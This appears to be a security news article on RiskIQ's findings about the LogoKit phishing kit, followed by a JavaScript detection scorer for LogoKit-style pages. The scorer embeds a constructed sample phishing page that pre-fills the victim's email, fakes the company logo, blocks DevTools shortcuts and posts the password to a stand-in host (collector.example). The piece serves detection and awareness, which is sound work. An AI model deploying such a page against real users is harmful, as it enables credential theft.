Researchers from RiskIQ discovered a new phishing kit, dubbed LogoKit, that stands out for its ability to dynamically build phishing pages tailored to specific users.
LogoKit has a modular structure that makes it easy to implement a Phishing-as-a-Service model.
When the victim navigates to the phishing URL, LogoKit fetches the target company's logo from a third-party service (e.g. Clearbit or Google's favicon database) and auto-fills the landing page with the victim's username or email address, so that the page looks like a site the victim has already logged into. Once the victim enters their password, LogoKit sends the credentials to an external source with an AJAX request and finally redirects the victim to their corporate website.
“RiskIQ has tracked LogoKit being used in simple login forms to trick users and embedded into more complex HTML documents pretending to be other services. Due to the simplicity of LogoKit, attackers can easily compromise sites and embed their script or host their own infrastructure.” reads the report published by the experts. “In some cases, attackers have been observed using legitimate object storage buckets, allowing them to appear less malicious by having users navigate to a known domain name, i.e., Google Firebase.”
RiskIQ spotted more than seven hundred unique domains running LogoKit in the last thirty days. Threat actors targeted multiple services, including Microsoft SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchanges.
In some instances, RiskIQ experts observed LogoKit deployments that blocked keyboard shortcuts in order to prevent victims from viewing or inspecting the page's content.
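The behaviours described above (an email address carried in the URL, a logo pulled from a third-party logo service for the victim's domain, a username field pre-filled from the URL, credentials posted to a host unrelated to the page, a redirect built at runtime from the victim's domain, and keyboard-shortcut blocking) can be turned into page-source indicators for triage. The scorer below is an added example written for this article, not RiskIQ's tooling or LogoKit's own code. The indicator names, regexes, the sample landing page, and all hostnames (phish.example, collector.example, corp.example) are constructed assumptions; only the Clearbit and Google favicon URL shapes are real service endpoints.

```javascript
// Added example (not RiskIQ's analysis code and not LogoKit source): a
// heuristic scorer for LogoKit-style landing pages, based only on the
// behaviour described in the article. Indicator names, regexes, the sample
// page and all hostnames are constructed assumptions for illustration.

// Third-party logo services the article names; both URL shapes are real.
const LOGO_SERVICES = [
  /https?:\/\/logo\.clearbit\.com\//i,            // Clearbit logo API
  /https?:\/\/www\.google\.com\/s2\/favicons\?/i, // Google favicon service
];

// Return the first e-mail address carried in the URL fragment or query, or null.
function emailFromUrl(pageUrl) {
  const u = new URL(pageUrl);
  const candidates = [u.hash.replace(/^#/, ""), ...u.searchParams.values()];
  for (const raw of candidates) {
    let text = raw;
    try { text = decodeURIComponent(raw); } catch (_) { /* keep raw on bad escapes */ }
    const m = text.match(/[\w.+-]+@(?:[\w-]+\.)+[a-z]{2,}/i);
    if (m) return m[0].toLowerCase();
  }
  return null;
}

// Score a page's source for the LogoKit behaviours the article describes.
function scoreLogoKit(pageUrl, html) {
  const findings = [];
  const pageHost = new URL(pageUrl).hostname;
  const email = emailFromUrl(pageUrl);
  const victimDomain = email ? email.split("@")[1] : null;

  // 1. The pretext is driven by an e-mail address embedded in the URL.
  if (email) findings.push("email-in-url");

  // 2. Company logo pulled from a third-party logo/favicon service.
  if (LOGO_SERVICES.some((re) => re.test(html))) findings.push("third-party-logo");

  // 3. Username field pre-filled from location.hash / location.search.
  if (/location\.(?:hash|search)/.test(html) && /\.value\s*=[^=]/.test(html)) {
    findings.push("prefill-from-url");
  }

  // 4. Credentials sent via fetch()/XMLHttpRequest to a host that is neither
  //    the page itself nor the victim's own domain.
  const callRe = /(?:fetch|\.open)\(\s*(?:["'][A-Z]+["']\s*,\s*)?["'](https?:\/\/[^"'\/\s]+)/gi;
  for (const m of html.matchAll(callRe)) {
    const host = new URL(m[1]).hostname;
    const victimOwned = victimDomain && (host === victimDomain || host.endsWith("." + victimDomain));
    if (host !== pageHost && !victimOwned) { findings.push("exfil-to-third-party"); break; }
  }

  // 5. Post-submit redirect built from a scheme prefix plus a runtime value,
  //    i.e. the victim is bounced to a domain chosen per e-mail address.
  if (/location(?:\.href)?\s*=\s*["']https?:\/\/["']\s*\+/.test(html)) findings.push("dynamic-redirect");

  // 6. keydown handler swallowing DevTools / view-source shortcuts.
  if (/keydown/.test(html) && /F12|ctrlKey/.test(html) && /preventDefault/.test(html)) {
    findings.push("devtools-shortcuts-blocked");
  }

  return { email, victimDomain, findings, score: findings.length };
}

// Constructed sample landing page (not real kit code) exercising every indicator.
const SAMPLE_URL = "https://phish.example/login.html#victim%40corp.example";
const SAMPLE_PAGE = `
<img id="logo"><form id="f"><input id="user"><input id="pass" type="password"></form>
<script>
var email = decodeURIComponent(location.hash.slice(1));
var domain = email.split("@")[1];
document.getElementById("logo").src = "https://logo.clearbit.com/" + domain;
document.getElementById("user").value = email;
document.addEventListener("keydown", function (e) {
  if (e.key === "F12" || (e.ctrlKey && (e.key === "u" || e.shiftKey))) e.preventDefault();
});
document.getElementById("f").onsubmit = function (ev) {
  ev.preventDefault();
  var x = new XMLHttpRequest();
  x.open("POST", "https://collector.example/submit");
  x.send("u=" + email + "&p=" + document.getElementById("pass").value);
  location.href = "https://" + domain;
};
</script>`;

// Constructed benign control: same-origin form, nothing dynamic.
const BENIGN_URL = "https://corp.example/login";
const BENIGN_PAGE = `<form action="/login" method="post">
<input name="user"><input name="pass" type="password"><button>Sign in</button></form>`;

console.log(scoreLogoKit(SAMPLE_URL, SAMPLE_PAGE));
console.log(scoreLogoKit(BENIGN_URL, BENIGN_PAGE));
```

Run with `node` on a saved page source and its URL; the sample page scores all six indicators while the benign form scores none. The regexes are deliberately loose, since kits are trivially re-minified, so treat the score as a triage hint that a page deserves a look rather than as a signature.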
“The LogoKit presents a unique opportunity for attackers, allowing for easy integration into either existing HTML pretext templates or building simple login forms to mimic corporate login portals. Also, with the flexibility of either leveraging compromised infrastructure, attacker-hosted infrastructure, or object storage, attackers can quickly change their delivery source.” concludes the report. “With LogoKit’s intended functionality to be centered around singular emails per URL and extracting company logos, this dramatically improves ease of carrying out targeted attacks against organizations; and reusing pretexts without changing templates.”